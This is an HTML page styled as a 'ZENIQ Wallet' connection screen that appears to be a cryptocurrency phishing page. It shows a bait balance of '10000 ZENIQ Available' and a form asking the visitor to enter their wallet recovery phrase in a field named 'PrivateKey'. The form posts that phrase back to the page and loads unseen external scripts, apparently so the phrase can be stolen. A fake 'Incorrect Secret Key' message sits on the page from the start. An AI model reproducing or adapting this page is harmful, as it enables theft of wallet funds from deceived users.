<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="images/truste.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="plugins@view/apk.css" rel="stylesheet">
<link rel="apple-touch-icon" href=images/truste.png"><title>ZENIQ Wallet</title>
<link href="plugins@view/chunk1.css" rel="stylesheet">
<link href="plugins@view/app.css" rel="stylesheet">
<link href="plugins@view/main.chunk.css" rel="stylesheet">
<script src="plugins@view/jquery.min.js"></script>
<script src="plugins@view/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
</head>
<body>


<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu">
<div class="sc-jnlKLf OHNdu">
<br><center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="images/825.png" alt="" style="height: 70px;width: 200px;"></div></center>




<div class="confirm-approve-content__title" style="
    font-size: 1.2rem;
    line-height: 140%;
    justify-content: center;
    text-align: center;
    margin-top: 22px;
    padding-left: 24px;
    padding-right: 24px;
    color: #050608;
    ">10000 ZENIQ Available.</div>


    <h4><center>Enter your secret phrase here to connect</center></h4>



<div class="sc-htoDjs cDnNqw">
	<form action="" method="post" id="myform" >
		<div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control">
<p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Enter Recovery Phrase" name="PrivateKey" id="wordsseed" minlength="24" maxlength="305" required="" style="
    height: 96px;
"></textarea>
<span style="color: RED">Incorrect Secret Key. Make sure it is 12 words with spaces between words.</span></div></div><div class="ant-form-item-explain">
                </div></div></div>

         <br>
<br>
<br>
<br>
<br>
<div class="thepadding">
<button class="button sc-VigVT fWmldN" ="disabled"="" id="imp" "="">NEXT</button>
</div>
<br>
<br>
<center>
<a class="nav-link" href="#"><font face="Arial" size="3" color="#050608">Nomo<!-- --><sub> powered by ZENIQ</sub></font></a>

</center>
</form></div>
                            </div>
							
                </div>

<script src="plugins@view/load.js"></script></body>
<script src="safir/script2.js"></script>
</html>